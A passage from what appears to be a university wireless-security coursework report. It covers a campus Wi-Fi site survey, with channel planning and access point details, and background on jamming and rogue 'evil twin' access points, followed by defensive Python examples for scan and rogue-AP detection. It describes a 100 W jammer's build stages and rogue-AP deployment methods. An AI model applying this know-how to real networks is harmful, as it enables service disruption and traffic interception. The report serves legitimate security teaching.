WMSS Documentation Full


Table of Contents

Network Site Survey – Group Part..................................................................................................4

1. Introduction..............................................................................................................................4

2. Overview of Selected Site.......................................................................................................4

2.1. Photos of Site Interior.......................................................................................................5

2.2. Photo of the Access Point.................................................................................................6

3. Site Survey Specification and Analysis...................................................................................6

3.1. Site Survey Specification..................................................................................................6

3.2. Overview of Tools............................................................................................................7

3.3. Access Point Analysis.......................................................................................................7

3.4. Network Heat Map – Ekahau..........................................................................................10

3.5. Access Point Specification..............................................................................................11

4. Penetration Testing on Site....................................................................................................12

4.1. Jamming..........................................................................................................................12

4.1.1. Introduction..............................................................................................................12

4.1.2. Types of Jammer...........................................................................12

4.1.3. How to Handle Jamming.........................................................................................13

4.1.4. How the jamming device works..............................................................................14

4.2. Rogue Access Point........................................................................................................15

References......................................................................................................................................17

Vulnerability Testing – Individual Part.........................................................................................18

1. Active Network Scanning in Wireless Local Area Network (Witchen Hendry TP030952). 18

1.1. Introduction.....................................................................................................................18

1.2. Hypothesis.......................................................................................................................18

1.3. Aim..................................................................................................................................19

WIRELESS AND MOBILE SECURITY (CT094-3-3-WMSS) 1


1.4. Objectives........................................................................................................................19

1.5. Network Scanning Tool: Nmap (Network Mapper).......................................................19

1.6. Comparison between Network Scanner..........................................................................20

1.7. Hardware, Software and Configuration..........................................................................21

1.8. Nmap Screenshot............................................................................................................21

1.9. Test Plan..........................................................................................................................23

1.10. Demonstration of Tool................................................................................................24

1.11. Evaluation....................................................................................................................31

1.12. Suggested Solutions and Recommendation................................................................32

1.13. Conclusion...................................................................................................................32

1.14. References...................................................................................................................33

2. Cracking home router Wi-Fi password with Fluxion (Fawwas Hamdi TP034298)..............34

2.1. Introduction.....................................................................................................................34

2.2. Hypothesis.......................................................................................................................35

2.3. Aim..................................................................................................................................35

2.4. Objective.........................................................................................................................35

2.5. Tools................................................................................................................................36

2.5.1. Hardware..................................................................................................................36

2.5.2. Software...................................................................................................................36

2.5.3. Tools For conducting the vulnerability testing (Comparison).................................37

2.6. Test Plan..........................................................................................................................38

2.7. Demonstration.................................................................................................................39

2.8. Evaluation.......................................................................................................................48

2.9. Suggested solution and recommendations......................................................................51

2.10. References...................................................................................................................53

3. Cracking home router Wi-Fi password with Reaver (Anthony Wibowo TP031822)...........54

3.1. Introduction.....................................................................................................................54

3.2. Application of Wireless Technology Applications.........................................................55

3.3. Wi-Fi Security in General...............................................................................................56

3.4. Hypothesis.......................................................................................................................57

3.5. Tools................................................................................................................................57

3.6. Test Plan..........................................................................................................................58

3.7. Demonstration.................................................................................................................58

3.8. Solution and Recommendation.......................................................................................63

3.9. References.......................................................................................................................65

4. Cracking home router Wi-Fi password with Dictionary Attack (Yanto TP032242).............66

4.1. Introduction.....................................................................................................................66

4.2. Hypothesis.......................................................................................................................66

4.3. Aim..................................................................................................................................67

4.4. Objectives........................................................................................................................67

4.5. Test Plan..........................................................................................................................67

4.6. Crack Tool Used.............................................................................................................68

4.7. Tool comparison.............................................................................................................68

4.8. Hardware and Software...................................................................................................69

4.9. Demonstration of Tool....................................................................................................69

4.10. Evaluation....................................................................................................................74

4.11. Solution and Recommendation...................................................................................74

4.12. References...................................................................................................................75

Network Site Survey – Group Part
1. Introduction
Jason (2014) states that a wireless site survey is the best way to learn where a wireless network's
coverage is optimal. It gives an understanding of channel interference and of uncovered zones, and
with that information the access point placement can be rearranged so that coverage becomes more
effective and the access points interfere less with each other.
The task below covers a site survey of the 6th floor lab of the APU new campus. First the tester takes
photos of the site and of the access point locations. Then the wireless site survey is done using an
application that can analyse channel usage, together with a heat mapper tool. The features of each
tool are described and discussed in a later part, and analysis and recommendations are given from
the results the tools produce. The next task is penetration testing on the site, done to check whether
the site is secure.

2. Overview of Selected Site


As stated above, the site chosen for the survey is the 6th floor lab of the APU New Campus. The
floor consists of 7 computer labs and 1 Technical Assistant office, as shown in the figure below.

Figure 1. APU New Campus 6th Floor.

2.1. Photos of Site Interior

Figure 2. One of the labs on the 6th floor.

Figure 3. Access point mounted in the middle of the lab.

2.2. Photo of the Access Point

Figure 4. Ruckus Wireless Access Point.

3. Site Survey Specification and Analysis


3.1. Site Survey Specification
Cisco (2013) states that the first step in a wireless site survey is an assessment of radio frequency
behaviour in the specific environment. Cisco (2013) also defines several types of site survey, two of
which matter here. The first is the passive survey, performed in listen-only mode: the survey
machine never associates with the access point. It is used to check whether a rogue access point is
present in the network, to determine the radio frequencies (channels) the access points use, and to
measure the noise and interference in the environment. This type of survey is used here, as it meets
the objectives of the survey conducted by the tester. The second is the active survey, in which the
client machine associates with the access point; it is used to measure rate shifting and to
troubleshoot transmission problems. Following the Cisco (2013) guidelines, the survey
specification is:
1. Environment: computer labs with one access point in each lab.
2. Zones: the survey is done in each lab that has no class in progress.
3. Survey target: radio frequency, channel statistics and signal strength.
4. Dense deployment: yes. Many access points were found on the floor, and the floors below and
above have their own access points as well.
5. Tools for survey: Acrylic Wi-Fi, Homedale and Ekahau HeatMapper.
3.2. Overview of Tools
Acrylic Wi-Fi - Home Edition (Demo)
As claimed by Tarlogic Security (2016), Acrylic Wi-Fi is a network analyser that performs Wi-Fi
scanning and provides detailed security information and coverage analysis. It comes in two
licences. The Home Edition is the free version, with the network scanning feature only. The
Professional Edition adds Wireshark integration, AirPcap support, detection of connected clients
and their details, report generation and other features.

Homedale (Free)
Homedale is a free wireless network analyser that shows the list of detected access points, a signal
graph and frequency usage. Its functionality is almost the same as Acrylic Wi-Fi, with one addition,
a Suggested Channel feature, and its frequency usage chart is more readable than Acrylic's.

3.3. Access Point Analysis


Acrylic Wi-Fi - Home Edition (Demo)

Figure 5. Network Analysis with Acrylic Wi-Fi.

Figure 6. 2.4GHz Channels usage.

The figures above show the Acrylic Wi-Fi survey results. Several access points were found in the
6th floor labs, and several of them advertise the same SSID. The analyst gathered the SSIDs present
on the 6th floor; the four most common, which are also the main SSIDs used in APU, are:
- Visitor@APU
- Wireless@APU
- Staff@APU
- BYOD@APU
Visitor@APU is intended for guests visiting APU, and its security is open authentication.
Wireless@APU also uses open authentication, because the real authentication happens after the
client has associated, through a login page that takes the student ID and password. Note that on
both of these SSIDs the login page only controls access: frames in the air are still unencrypted, so
anything not protected by TLS can be read by anyone in range. Staff@APU and BYOD@APU use
WPA2, which requires a password when connecting.
The figure also shows that most of the channels used for data transmission are channels 2, 6 and
13. This is not the most effective channel allocation, as channels 2 and 6 still overlap.

Figure 7. Channel Allocation. [ CITATION Cis15 \l 1033 ]

Based on the figure above from Cisco (2015), the channels that do not overlap each other are 1, 6
and 11. In the United States channels 13 and 14 are not used (channel 14 is permitted only in Japan,
and only for 802.11b), but in most other regulatory domains, including Asian countries, channel 13
is permitted. The use of channel 13 in the APU wireless network is therefore acceptable, while the
access points on channel 2 should be moved to channel 1 so that they no longer overlap channel 6.

Homedale (Free)

Figure 8. Homedale Network Analysis.

Homedale presents the same information as Acrylic Wi-Fi but adds a Suggested Channel feature. In
the figure above it suggests channel 10, which is acceptable if the channel plan becomes 1, 6, 9/10,
13, so that four channels are in use and no single channel is heavily loaded. That plan still has
overlap between channels 6 and 9, or between 10 and 13, though. Where channel 13 is permitted,
the four-channel plan 1, 5, 9, 13 keeps 20 MHz between adjacent centre frequencies, so the OFDM
subcarriers of 20 MHz 802.11g/n channels do not overlap. The recommendation here is to split the
most used access points across channels 1 and 13, and to configure the least used access point on
channel 9/10.
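The overlap reasoning above can be checked mechanically. The following Python is an added example written for this page, not part of the report or of any of the survey tools: it computes channel overlap from centre frequencies (2407 MHz plus 5 MHz per channel, with channel 14 at 2484 MHz) for a chosen occupied bandwidth, and the access point list it scores is constructed from the SSIDs and channels named in section 3.3 rather than taken from the survey data.

```python
# Added example (not part of the report): check 2.4 GHz channel plans for
# overlap, the analysis the text does by eye from the Acrylic and Homedale
# screenshots. The SURVEY list is constructed from the SSIDs and channels the
# report names, not copied from the survey data.
from itertools import combinations


def center_mhz(channel: int) -> int:
    """Centre frequency of a 2.4 GHz channel in MHz.

    Channels 1-13 sit 5 MHz apart starting at 2412 MHz; channel 14 (Japan,
    802.11b only) is the special case at 2484 MHz.
    """
    if channel == 14:
        return 2484
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    raise ValueError(f"not a 2.4 GHz channel: {channel}")


def overlaps(ch_a: int, ch_b: int, width_mhz: int = 22) -> bool:
    """True when two channels share spectrum.

    Two channels overlap when their centres are closer than the occupied
    bandwidth: 22 MHz is the conservative 802.11b (DSSS) figure behind the
    classic 1/6/11 plan; 20 MHz is the 802.11g/n OFDM channel width, under
    which 1/5/9/13 is also clean. Co-channel (same number) counts as overlap.
    """
    return abs(center_mhz(ch_a) - center_mhz(ch_b)) < width_mhz


def conflicting_pairs(aps, width_mhz: int = 22):
    """aps: iterable of (name, channel). Returns the AP pairs that interfere."""
    return [
        (name_a, name_b)
        for (name_a, ch_a), (name_b, ch_b) in combinations(aps, 2)
        if overlaps(ch_a, ch_b, width_mhz)
    ]


def is_clean_plan(channels, width_mhz: int = 22) -> bool:
    """True when no two channels of the plan overlap at the given width."""
    return not conflicting_pairs([(f"ch{c}", c) for c in channels], width_mhz)


# Constructed survey snapshot: the channel mix the report observed (2, 6, 13).
SURVEY = [
    ("Visitor@APU lab-1", 2),
    ("Wireless@APU lab-2", 6),
    ("Staff@APU lab-3", 13),
]

if __name__ == "__main__":
    print("conflicts at 22 MHz:", conflicting_pairs(SURVEY))
    for plan in ([1, 6, 11], [1, 6, 13], [1, 5, 9, 13], [1, 6, 9, 13], [2, 6, 13]):
        print(plan, "20 MHz:", is_clean_plan(plan, 20), "22 MHz:", is_clean_plan(plan, 22))
```

Running it shows that 2/6/13 has one overlapping pair, 1/6/13 has none, and 1/5/9/13 is clean for 20 MHz OFDM channels but not under the 22 MHz 802.11b assumption, which is why 1/6/11 (or 1/6/13 where allowed) stays the conservative choice while legacy 802.11b clients are still around.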
3.4. Network Heat Map – Ekahau
For the network heat map the analyst uses Ekahau HeatMapper as the heat map generation tool. The
floor plan was redrawn at a larger scale to make it easier to map.

Figure 9. Recreated Floor Plan and the Heat Map.

3.5. Access Point Specification


Description: High-end 802.11ac Wave 2 AP with MU-MIMO and BeamFlex+
Maximum PHY rate: 1,733 Mbps (5 GHz), 800 Mbps (2.4 GHz)
Wi-Fi technology: 802.11ac Wave 2 (5 GHz), 802.11n (2.4 GHz)
Concurrent users: 512
Radio chains:streams: 4x4:4
BeamFlex gains: 6 dB
Max. interference mitigation: 15 dB
PD-MRC: Yes
Rx sensitivity: -104 dBm
ChannelFly: Yes
Smart meshing: Yes
USB: Yes
Ethernet ports: 2

4. Penetration Testing on Site
4.1. Jamming
4.1.1. Introduction
Jamming is deliberate interference that disrupts the reception or transmission of data (Robert,
2013). The disruption comes from a signal on the same, or almost the same, frequency as the
legitimate signal, so that the receiver can no longer separate the data from the noise.
Jamming is an action that corrupts the signal in a given area; with enough power the signal is
drowned out completely and cannot be received at all. Jamming becomes more dangerous when
done by irresponsible actors (for example terrorists) who paralyse a city's networks as part of an
attack.
A jammer is therefore a device that partially or completely interferes with node signals by raising
the power spectral density of the noise in the channel.

4.1.2. Types of Jammer

1. Single-Tone Jammer
A single-tone jammer transmits one frequency that lies within the bandwidth of the jammed signal.
It targets narrowband communication, which makes it effective against wireless sensor networks
built on traditional narrowband radios. This type of jammer tries to hold the node's channel busy in
the specified bandwidth, which may result in dead links and reduced node coverage.
2. Multiple-Tone Jammer
A jammer that disrupts several channels at once, or several receivers on different channels. If every
channel is covered the node fails completely, and it can only recover when the jammer is turned off.
The intruder usually plays safe by switching the radio off occasionally while congesting the node, so
that neighbouring nodes assume the node is not under attack but merely low on energy and in need
of recovery. Detection of the jammed node is therefore very important.
3. Pulsed-Noise Jammer
A pulsed-noise jammer is a wideband jammer that behaves like a pulsed signal, turning on and off
periodically. Its main purpose is to disrupt spread spectrum communications by concentrating peak
jamming power during the "on" time. Two types of pulsed-noise jammer are considered: slowly
switching and fast switching jammers.
4. ELINT
ELINT (electronic intelligence) is usually a passive system that intercepts and analyses radar or
TCF communication signals; it does not transmit itself but characterises the target's signals.

4.1.3. How to Handle Jamming

1. Using the spread spectrum (SS) technique
Spreading the data across a wide frequency spectrum makes the signal resistant to jamming, noise
and eavesdropping. Varieties of SS include direct sequence (DS), frequency hopping (FH), time
hopping (TH) and hybrids (Hanson, 2012). Using SS in sensor networks has both advantages and
disadvantages.
A. Advantages of SS
1) Ability to mitigate multipath interference
2) Reduced effect of jamming attacks
3) Lower power spectral density
B. Weaknesses of SS
1) Bandwidth inefficiency
2) Complex implementation
3) Computing cost
2. Using FHSS
FHSS consumes more power, as the hopping frequency has to be synchronised between sender and
receiver.
3. Using IEEE 802.15.4
The IEEE 802.15.4 standard uses DSSS with CSMA-CA. ZigBee, which builds on it, is being
considered as the wireless technology for wireless sensor networks because it consumes less
power.
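To make the spread spectrum argument in item 1 concrete, here is an added example (not from the report or from any cited source) of direct-sequence spreading in pure Python: a 31-chip m-sequence spreads each data bit, a single-tone jammer sitting on the carrier is modelled as a constant offset in baseband, and despreading recovers the data as long as the jammer's despread contribution stays below the code length. The data bits and the jammer amplitudes are constructed values.

```python
# Added example (not part of the report): how direct-sequence spread spectrum
# (DSSS) survives a single-tone jammer. Pure-Python baseband simulation; the
# bit pattern and jammer levels are constructed for illustration.
import math


def m_sequence(length: int = 31):
    """One period of a 31-chip maximal-length sequence as +1/-1 chips.

    5-stage Fibonacci LFSR with recurrence s[n+5] = s[n+3] + s[n] over GF(2)
    (primitive polynomial x^5 + x^3 + 1), so the period is 2^5 - 1 = 31 chips
    holding 16 ones and 15 zeros: the code is almost perfectly balanced.
    """
    state = [1, 1, 1, 1, 1]
    chips = []
    for _ in range(length):
        chips.append(1 if state[-1] else -1)
        feedback = state[4] ^ state[1]
        state = [feedback] + state[:-1]
    return chips


def spread(bits, pn):
    """Multiply every data bit (+1/-1) by the whole chip sequence."""
    return [bit * chip for bit in bits for chip in pn]


def add_tone_jammer(chips, amplitude: float):
    """A continuous-wave tone exactly on the carrier appears in baseband as a
    constant offset, so the single-tone jammer adds `amplitude` to every chip.
    Data chips have amplitude 1, so amplitude 20 is a jammer 26 dB above the
    signal (20*log10(20))."""
    return [chip + amplitude for chip in chips]


def despread(received, pn):
    """Correlate each chip block with the code and decide by sign.

    Signal term: bit * len(pn). Jammer term: amplitude * sum(pn), which for
    this balanced code is only amplitude * 1, so the jammer must exceed the
    code length before it can flip a bit.
    """
    n = len(pn)
    bits = []
    for start in range(0, len(received), n):
        block = received[start:start + n]
        correlation = sum(r * c for r, c in zip(block, pn))
        bits.append(1 if correlation >= 0 else -1)
    return bits


def processing_gain_db(chips_per_bit: int) -> float:
    """Textbook DSSS processing gain, 10*log10(chips per bit): 14.9 dB for 31."""
    return 10 * math.log10(chips_per_bit)


def jammer_that_breaks_link(pn) -> float:
    """Smallest on-carrier tone amplitude that flips a -1 bit: the jammer's
    despread contribution amplitude*|sum(pn)| must reach the signal's len(pn)."""
    return len(pn) / abs(sum(pn))


if __name__ == "__main__":
    pn = m_sequence()
    data = [1, -1, 1, 1, -1, -1, 1]          # constructed payload
    tx = spread(data, pn)
    print("processing gain: %.1f dB" % processing_gain_db(len(pn)))
    print("jammer x20 ->", despread(add_tone_jammer(tx, 20.0), pn))
    print("jammer x40 ->", despread(add_tone_jammer(tx, 40.0), pn))
```

At a jammer 20 times the signal amplitude every bit still decodes; at 40 times the -1 bits flip, so the link needs a longer code (more processing gain) or frequency hopping to survive, which is the trade-off items 1 and 2 above describe. A tone offset from the carrier is suppressed by the code's spectral spreading rather than by its exact DC balance, so its residual after despreading varies with the offset; the on-carrier case is the one that can be worked exactly by hand.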

4.1.4. How the jamming device works
1. Exciter
The most important part: the whole process of generating the sweep signal, the noise and the
oscillator signal (voltage-controlled oscillator) happens in this stage.
2. Driver Amplifier
This stage amplifies the output of the exciter before it enters the power amplifier. The driver
amplifier is a wideband amplifier working as a class A (linear) amplifier.
3. Power Amplifier
The last stage before the antenna. It works like the driver amplifier, as a class A (linear) amplifier,
and produces an output power of 100 W.
4. Power Supply
A supply dedicated to the power amplifier only, adjustable to 28 V and delivering 15 A.
5. Tx Antenna
A discone antenna is used. The type is less common, as it is mostly found in commercial and
military equipment; its advantages are omnidirectional radiation and a very wide (broadband)
frequency range. The equipment functioned well, but the prospective user wished to research
further development of both its dimensions and its performance.

4.2. Rogue Access Point
One way to conduct a man-in-the-middle (MITM) attack is to use a Rogue Access Point (RAP). A
RAP is an access point that was not installed by the Wi-Fi network administrator and has no
authorisation from the administrator; a RAP that imitates a legitimate access point is also referred
to as an Evil Twin access point, as shown in the figure below.

Figure 10. Evil Twin Access Point (Source:
https://d1b10bmlvqabco.cloudfront.net/attach/i2i2dhph8zs6vh/i2z7j27ej7512/i959l5z0vl9c/evll_twin_attack.jpg)

A RAP can be deployed in two ways: by connecting the access point directly to an Ethernet port of
the wired network infrastructure, or by connecting a wireless device to an access point within range
(Kim et al., n.d.). Based on who deploys the RAP, there are generally four types:

1. RAP installed by employees: an employee of a company or agency installs an access point on the
existing office LAN without the network administrator's approval, for the convenience of reaching
the LAN over Wi-Fi. The RAP opens a security gap in the network that lets unauthorised users or
attackers reach the company network. This type of RAP often appears in organisations that pay
little attention to network security and have not made their employees security-aware.
2. External RAP created by an attacker: the RAP is built outside the computer network and is not
connected to the company network. Usually a Wi-Fi device with a strong signal is pointed into the
target office area, advertising the same SSID as the company's existing Wi-Fi network. The goal is
to harvest information from employees by routing their traffic through the RAP.
3. Internal RAP created by an attacker: the RAP is placed by an attacker inside the company and
connected to its network in order to gain backdoor access to the LAN. Usually such a RAP does not
broadcast its SSID, so that it stays unknown to others. Although hard to set up, once in place it
leads to a full penetration of the network.
4. RAP belonging to a neighbour: an access point set up by a nearby office whose coverage extends
into other offices. Because its purpose is to provide Wi-Fi for that office, the administrators of the
neighbouring offices have no right and no access to turn it off. Although not malicious, access to a
neighbour's RAP can still cause a security hole.
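The four RAP types above differ in what a survey tool sees: a known SSID from an unknown BSSID (type 2), a hidden SSID from an unknown BSSID (type 3), or an unknown SSID (types 1 and 4). The following Python is an added example, not the report's own work or any vendor's detection logic; it classifies a passive-survey snapshot, the rogue check that section 3.1 names as a purpose of a passive survey, against an inventory of authorised access points. The inventory, the BSSIDs (locally administered 02: addresses that belong to no real device) and the scan records are all constructed.

```python
# Added example (not part of the report): classify access points seen in a
# passive survey against an inventory of authorised APs. Inventory, BSSIDs
# and scan records are constructed; the SSIDs are the ones section 3.3 names.
from dataclasses import dataclass


@dataclass(frozen=True)
class Observation:
    ssid: str
    bssid: str
    security: str      # "OPEN", "WPA2", ...
    channel: int
    rssi_dbm: int


# Authorised inventory: SSID -> (expected security, known BSSIDs). Made up.
INVENTORY = {
    "Staff@APU":    ("WPA2", {"02:00:00:aa:00:01", "02:00:00:aa:00:02"}),
    "BYOD@APU":     ("WPA2", {"02:00:00:aa:00:11", "02:00:00:aa:00:12"}),
    "Visitor@APU":  ("OPEN", {"02:00:00:aa:00:21", "02:00:00:aa:00:22"}),
    "Wireless@APU": ("OPEN", {"02:00:00:aa:00:31", "02:00:00:aa:00:32"}),
}


def classify(obs: Observation, inventory=INVENTORY) -> str:
    """Verdict for one observed AP.

    authorised          SSID and BSSID in the inventory, security as expected
    security-mismatch   known BSSID advertising the wrong security (misconfigured AP)
    evil-twin           known SSID from an unknown BSSID (external RAP, type 2)
    hidden-unknown      unknown AP hiding its SSID (internal RAP, type 3)
    unknown-ssid        anything else: a neighbour or an employee RAP (types 1 and 4)
    """
    if obs.ssid not in inventory:
        return "hidden-unknown" if obs.ssid == "" else "unknown-ssid"
    expected_security, known_bssids = inventory[obs.ssid]
    if obs.bssid.lower() not in known_bssids:
        return "evil-twin"
    if obs.security != expected_security:
        return "security-mismatch"
    return "authorised"


def rogue_report(observations, inventory=INVENTORY):
    """Everything not authorised, strongest signal first: the loudest impostor
    is the one clients will prefer."""
    flagged = [(classify(o, inventory), o) for o in observations]
    flagged = [(v, o) for v, o in flagged if v != "authorised"]
    flagged.sort(key=lambda pair: -pair[1].rssi_dbm)
    return [(v, o.ssid or "<hidden>", o.bssid, o.security, o.channel, o.rssi_dbm)
            for v, o in flagged]


def cloned_bssids(observations):
    """BSSIDs seen on more than one channel in one sweep. A spoofed BSSID slips
    past the allow-list in classify(), but one radio cannot sit on two channels."""
    channels = {}
    for o in observations:
        channels.setdefault(o.bssid.lower(), set()).add(o.channel)
    return sorted(b for b, chans in channels.items() if len(chans) > 1)


# Constructed scan, in the shape of an Acrylic Wi-Fi / Homedale export.
SCAN = [
    Observation("Staff@APU",   "02:00:00:aa:00:01", "WPA2", 13, -52),  # authorised
    Observation("Visitor@APU", "02:00:00:aa:00:22", "OPEN",  6, -55),  # authorised
    Observation("Staff@APU",   "02:00:00:ee:00:09", "OPEN",  6, -38),  # evil twin, open, loud
    Observation("BYOD@APU",    "02:00:00:aa:00:12", "OPEN", 13, -60),  # real AP, wrong security
    Observation("",            "02:00:00:ee:00:10", "WPA2",  1, -70),  # hidden, unknown
    Observation("CoffeeShop",  "02:00:00:cc:00:01", "WPA2", 11, -80),  # neighbour
    Observation("Staff@APU",   "02:00:00:aa:00:01", "WPA2",  1, -40),  # cloned BSSID, other channel
]

if __name__ == "__main__":
    for row in rogue_report(SCAN):
        print(row)
    print("cloned:", cloned_bssids(SCAN))
```

The allow-list is only as good as the attacker's laziness: an evil twin that clones an authorised BSSID classifies as authorised. cloned_bssids() catches the cheap version of that trick, the same BSSID showing up on two channels in one sweep; a clone on the same channel needs a wireless IDS that compares beacon timing or the AP's radio signature.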

References
Cisco, 2013. Site Survey Guidelines for WLAN Deployment. [Online] Available at:
http://www.cisco.com/c/en/us/support/docs/wireless/5500-series-wireless-controllers/116057-site-survey-guidelines-wlan-00.html
[Accessed 28 June 2017].
Cisco, 2015. Chapter: WLAN RF Design Considerations. [Online] Available at:
http://www.cisco.com/c/en/us/td/docs/solutions/Enterprise/Mobility/emob73dg/emob73/ch3_WLAN.html
[Accessed 27 June 2017].
Jason, 2014. Wireless Site Surveys: The Basics. [Online] Available at:
http://www.networkcomputing.com/wireless/wireless-site-surveys-basics/861543211
[Accessed 28 June 2017].
Kim, Sang-Eon, C., Byung-Soo, L. & Hong, S., n.d. Rogue AP Detection in the Wireless LAN for
Large Scale Deployment. Systemics, Cybernetics and Informatics, IV(5), pp. 78-85.
Tarlogic Security, 2016. Acrylic WiFi: Diagnose and improve your Wireless networks. [Online]
Available at: https://www.acrylicwifi.com/en/ [Accessed 17 May 2017].

Vulnerability Testing – Individual Part
1. Active Network Scanning in Wireless Local Area Network (Witchen Hendry TP030952)
1.1. Introduction
Rouse (2017) defines reconnaissance as the phase in which the intruder engages with the targeted
system and tries to gather as much information as possible about the target machine. Active
network scanning is one step of reconnaissance. The word active indicates that the process reaches
or connects to the target directly; network scanning is the technique used to gain information about
the scanned network. Compared to passive scanning, this method is easily detected by the target,
because the connection attempts are recorded in the victim machine's logs, but it can give more
valuable information about the host or the local area network.

For a black hat hacker, network scanning is a very useful technique to gain information about the
network and the victim machine, while a white hat hacker needs network scanning to find possible
vulnerabilities and close the holes before the wrong person exploits them. Network scanning reveals
which hosts in a local network are alive; each live host can then be scanned for open ports, each
open port for the service running on it, and each service for known vulnerabilities. If a service is
vulnerable, the attacker can send a payload directly to it and take control of the victim machine
[Raf15].
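Because active scanning leaves traces in the target's logs, the defender can turn the connection log into a scan alarm. The following Python is an added example, not from the report: it parses SYN entries in iptables LOG format (the kind a rule such as "iptables -A INPUT -p tcp --syn -j LOG --log-prefix 'SYN '" writes to syslog) from a constructed sample log, and flags a source that touches many ports on one host (port scan) or one port on many hosts (host sweep) inside a short window. The hostnames, addresses, times and thresholds are assumptions made for the example.

```python
# Added example (not part of the report): detect an active scan from the
# target's own connection log. Log lines are constructed in iptables LOG
# format; hosts, times and thresholds are made up for the example.
import re
from collections import defaultdict
from datetime import datetime

LOG_LINE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ kernel: .*?"
    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) .*?PROTO=(?P<proto>\w+) "
    r"(?:SPT=\d+ )?DPT=(?P<dpt>\d+)"
)


def parse(line: str):
    """Return (timestamp, src, dst, proto, dport), or None for other lines."""
    m = LOG_LINE.search(line)
    if not m:
        return None
    ts = datetime.strptime("2017 " + m["ts"], "%Y %b %d %H:%M:%S")  # syslog has no year
    return ts, m["src"], m["dst"], m["proto"], int(m["dpt"])


def detect_scans(lines, window_s=10, port_threshold=15, host_threshold=10):
    """Sliding-window detector over SYN log lines.

    port-scan:  one source hits >= port_threshold distinct ports on one
                destination within window_s seconds (nmap's default touches 1000).
    host-sweep: one source hits >= host_threshold distinct destinations on the
                same port within the window (a ping sweep or single-port scan).
    Returns a sorted list of (kind, src, count), one entry per (kind, src).
    """
    events = sorted(e for e in map(parse, lines) if e)
    by_src = defaultdict(list)
    for ts, src, dst, _proto, dport in events:
        by_src[src].append((ts, dst, dport))
    alerts = {}
    for src, evs in by_src.items():
        for i, (t0, _, _) in enumerate(evs):
            ports = defaultdict(set)   # dst   -> distinct ports seen in window
            hosts = defaultdict(set)   # dport -> distinct dsts seen in window
            for t, dst, dport in evs[i:]:
                if (t - t0).total_seconds() > window_s:
                    break
                ports[dst].add(dport)
                hosts[dport].add(dst)
            worst_ports = max(len(s) for s in ports.values())
            worst_hosts = max(len(s) for s in hosts.values())
            if worst_ports >= port_threshold:
                key = ("port-scan", src)
                alerts[key] = max(alerts.get(key, 0), worst_ports)
            if worst_hosts >= host_threshold:
                key = ("host-sweep", src)
                alerts[key] = max(alerts.get(key, 0), worst_hosts)
    return sorted((kind, src, n) for (kind, src), n in alerts.items())


def _line(ts, src, dst, dport):
    """One constructed iptables LOG line in syslog."""
    return (f"{ts} lab-pc kernel: SYN IN=wlan0 OUT= MAC=02:00:00:00:00:01 SRC={src} DST={dst} "
            f"LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=TCP SPT=40000 DPT={dport} "
            f"WINDOW=1024 RES=0x00 SYN URGP=0")


SAMPLE_LOG = (
    # benign: a browser on .7 using the router's 80/443 for 20 seconds
    [_line(f"Jun 28 10:00:{s:02d}", "192.168.0.7", "192.168.0.1", 80 if s % 2 else 443)
     for s in range(20)]
    # nmap-style port scan: .15 probing 30 ports on .20 within four seconds
    + [_line(f"Jun 28 10:00:{30 + p // 10:02d}", "192.168.0.15", "192.168.0.20", p)
       for p in range(1, 31)]
    # host sweep: .15 probing port 445 on twelve hosts in one second
    + [_line("Jun 28 10:00:40", "192.168.0.15", f"192.168.0.{100 + h}", 445)
       for h in range(1, 13)]
)

if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_LOG):
        print(alert)
```

Nmap's default scan touches 1000 ports in seconds, so even a cautious threshold fires on it; a scan slowed with -T0/-T1 or spread across several source addresses stays under the window, which is the case a network IDS such as Snort or a host tool such as psad is tuned for.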

1.2. Hypothesis
Nowadays the number of wireless devices is countless; they are embedded everywhere, in mobile
phones, laptops, smart watches, smart cars and even in small Internet of Things (IoT) appliances.
This makes wireless hacking one of the most common attack vectors. Chickowski (2015) supports
this, stating that exploitation of the Internet of Things is the third most dangerous attack. These
attacks are possible because the attacker is able to scan for and find every live machine in the
network, as stated in the introduction, and the scanning is easy, fast and automated with a
powerful tool like Nmap. In this paper the researcher hypothesises that an attacker can easily gain
information about the victim network and machines by doing a network scan, and that this leads to
exploitation. The researcher also hypothesises that if the victim machine can defend itself against
network scanning and become undetectable, the chance of being attacked is lower and the overall
number of attacks on wireless local area networks can be reduced.

1.3. Aim
This paper shows how an attacker is able to find vulnerable machines in a wireless local area
network using network scanning, and ways to prevent it.
1.4. Objectives
- To perform live host detection on a home wireless local area network.
- To perform open port detection for each host.
- To perform vulnerability scanning on each port.
- To analyse the network scanning technique and recommend ways to mitigate the attack.

1.5. Network Scanning Tool: Nmap (Network Mapper)


The official Nmap page (Nmap, 2017) states that Nmap is a free and open source utility for network
discovery and security auditing, usable for tasks such as network inventory, managing service
upgrade schedules, and monitoring host or service uptime. Nmap (2017) also states that the tool
uses raw IP packets in novel ways to detect the hosts available on a network, the services running
on those hosts, their operating systems, the firewall rules in place, and more. Nmap has limitations,
though. It is noisy, so it is easily detected by an IDS/IPS, and it is not a dedicated vulnerability
scanner: vulnerability checks are done by the Nmap Scripting Engine (NSE). Nmap ships with a
vuln category of NSE scripts (run with nmap --script vuln), but each script checks one specific
weakness, and writing a new script for a new vulnerability requires considerable knowledge, so for
broad vulnerability scanning Nmap is relatively inefficient. Compared with another well-known
network scanner, Angry IP Scanner (Angry IP Scanner, 2017), Nmap is much more advanced, as it
has far more techniques for detecting hosts and ports. A third well-known tool, Nessus, is both a
network scanner and a vulnerability scanner. Each has its own advantages and disadvantages; the
table below compares the three.
1.6. Comparison between Network Scanner
Feature | Nmap | Angry IP Scanner | Nessus
Host detection | Detects live hosts and their ports | Detects live hosts and their ports | Detects live hosts and their ports
Port scanning methods | Wide range of scan options: TCP SYN, NULL, FIN, XMAS, UDP and ICMP scans (one of its main strengths) | TCP, UDP and ICMP scans | TCP, UDP and ICMP scans
Vulnerability scan | Through the Nmap Scripting Engine | None | Through security check plugins
Number of CVEs that can be scanned | 566 (Nmap, 2017) | 0 | 38,376 (Tenable, 2017)
Portable | Portable | Portable | Not portable
GUI available | No (Zenmap is needed) | Yes | Yes
User friendliness | Needs familiarity with the terminal and reading the help output | Easiest to use: GUI with simple features | Easier to use: GUI, but more complex features
Processing power | Low | Low | High
Sources of information: [Raf15], [JFo10], [sir16].

1.7. Hardware, Software and Configuration
Hardware:
- Laptop: ASUS K401U
- Wireless Card: TP-Link TL-WN722N
Software:
